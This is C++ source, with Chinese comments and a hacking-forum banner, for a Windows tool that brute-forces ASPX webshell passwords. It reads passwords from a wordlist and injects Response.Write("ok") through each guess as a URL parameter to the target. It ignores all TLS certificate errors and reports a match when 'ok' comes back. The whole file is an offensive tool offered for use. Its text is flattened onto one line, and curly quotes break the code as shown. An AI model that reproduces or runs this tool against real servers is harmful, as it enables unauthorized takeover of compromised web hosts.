#include "stdafx.h"#include <stdio.h>#include <Windows.h>#include <stdlib.h>#include <string.h>#include <string>#include <winhttp.h>#pragma comment(lib,"winhttp.lib")void banner() //显示banner{	printf("[-]:Webshell Aspx crack T00ls\r\n[-]:Welcome www.90sec.org\r\n");}int _tmain(int argc, _TCHAR * argv []){	DWORD dwsize = 0;	LPSTR pszOutBuffer;	LPBYTE lpHeader, lpData;	LPCWSTR Host = argv[1];	LPCWSTR Url = argv[2];	char buf[MAX_PATH] = {0}; //fgets接收字符串	FILE* fp;	int i = 0;	if (argc < 4) //如果入口长度小于4	{		banner();		printf("[-]:%S Host Domain_Url Password_List\r\n",argv[0]);		return 0;	}	if ((fp = _wfopen(argv[3],L"rb")) == NULL) //打开文件，如果不存在	{		printf("File not found\r\n"); //打印错误		return 0;	}	while ((fgets(buf,MAX_PATH,fp))) //这儿注意，fgets读取文件，默认一行尾端会增加一个回车，我就是在这儿卡了一晚上	{		buf[strlen(buf) - 2] = ‘\0‘; //倒数第二个字符，也就是回车，替换	HINTERNET Hinternet = WinHttpOpen(L"HttpClient 1.0", //定义访问sessions		WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,		WINHTTP_NO_PROXY_NAME,		WINHTTP_NO_PROXY_BYPASS,0);	if (Hinternet == NULL) //如果定义访问的sessions为空	{		printf("Failed to Initialize http sessions\r\n");		return 0;	}	HINTERNET Hconnect = WinHttpConnect(Hinternet, //初始化连接		Host, //定义地址		INTERNET_DEFAULT_HTTPS_PORT,//默认端口443		0);	if (Hconnect == NULL) //如果为空，就close winhttp句柄	{		printf("Hconnect error\r\n");		WinHttpCloseHandle(Hinternet);		return 0;	}	WCHAR* res = new WCHAR[MAX_PATH + 1]; //释放内存，准备写入数据	wsprintf(res,L"%s?%S=Response.Write(\"ok\");Response.End()",Url,buf); //写入字符串到释放内存的变量里	HINTERNET Hrequest = WinHttpOpenRequest(Hconnect, //准备传输，定义好格式		L"GET",		res,		L"HTTP /1.1",		WINHTTP_NO_REFERER,		WINHTTP_DEFAULT_ACCEPT_TYPES,		WINHTTP_FLAG_SECURE|WINHTTP_FLAG_REFRESH);	if (Hrequest == NULL) 	{		WinHttpCloseHandle(Hinternet);		WinHttpCloseHandle(Hconnect);		return 0;	}	DWORD dwFlags;	DWORD dwBuffLen = sizeof(dwFlags);           	WinHttpQueryOption (Hrequest, WINHTTP_OPTION_SECURITY_FLAGS, //设置查询选项		(LPVOID)&dwFlags, &dwBuffLen);	dwFlags |= SECURITY_FLAG_IGNORE_UNKNOWN_CA;	dwFlags |= SECURITY_FLAG_IGNORE_CERT_DATE_INVALID;	dwFlags |= SECURITY_FLAG_IGNORE_CERT_CN_INVALID;	dwFlags |= SECURITY_FLAG_IGNORE_CERT_WRONG_USAGE;	WinHttpSetOption (Hrequest, WINHTTP_OPTION_SECURITY_FLAGS, //设置选项		&dwFlags, sizeof (dwFlags) );	if (WinHttpSendRequest(Hrequest, //发送数据		WINHTTP_NO_ADDITIONAL_HEADERS,0,		WINHTTP_NO_REQUEST_DATA,0,0,0) == FALSE)	{		DWORD err  = GetLastError();		WinHttpCloseHandle(Hrequest);		WinHttpCloseHandle(Hconnect);		WinHttpCloseHandle(Hinternet);		return 0;	}	if (WinHttpReceiveResponse(Hrequest,NULL) == FALSE) //开始读取相应	{		DWORD err = GetLastError();		WinHttpCloseHandle(Hrequest);		WinHttpCloseHandle(Hconnect);		WinHttpCloseHandle(Hinternet);		return 0;	}	DWORD dwSize = 0;	if (!WinHttpQueryDataAvailable( Hrequest, &dwSize)) //检查是否还有数据接受		printf( "Error %u in WinHttpQueryDataAvailable.\n",		GetLastError());	WinHttpQueryHeaders(Hrequest, //查看http响应头		WINHTTP_QUERY_RAW_HEADERS_CRLF,		WINHTTP_HEADER_NAME_BY_INDEX,NULL,		&dwsize,WINHTTP_NO_HEADER_INDEX);	lpHeader = (LPBYTE)HeapAlloc(GetProcessHeap(), 0, dwsize);	WinHttpQueryHeaders(Hrequest, 		WINHTTP_QUERY_RAW_HEADERS_CRLF, 		WINHTTP_HEADER_NAME_BY_INDEX, 		lpHeader, &dwsize, 		WINHTTP_NO_HEADER_INDEX);	HeapFree(GetProcessHeap(), 0, lpHeader);	DWORD dwDownloaded = 0;	pszOutBuffer = new char[dwSize+1];	if (!pszOutBuffer)	{		printf("Out of memory\n");	}	ZeroMemory(pszOutBuffer, dwSize+1); 	if (!WinHttpReadData( Hrequest, (LPVOID)pszOutBuffer, 		dwSize, &dwDownloaded))	{                                  		printf( "Error %u in WinHttpReadData.\n", GetLastError());	}	if (strstr(pszOutBuffer,"ok"))	{		printf("Line:%d-->Find password Success:%s\n",++i,buf);		return 0;	}else	{		printf("Line:%d-->password Not found:%s\n",++i,buf);	}}	delete[] pszOutBuffer;	//delete[] res;	return 0;}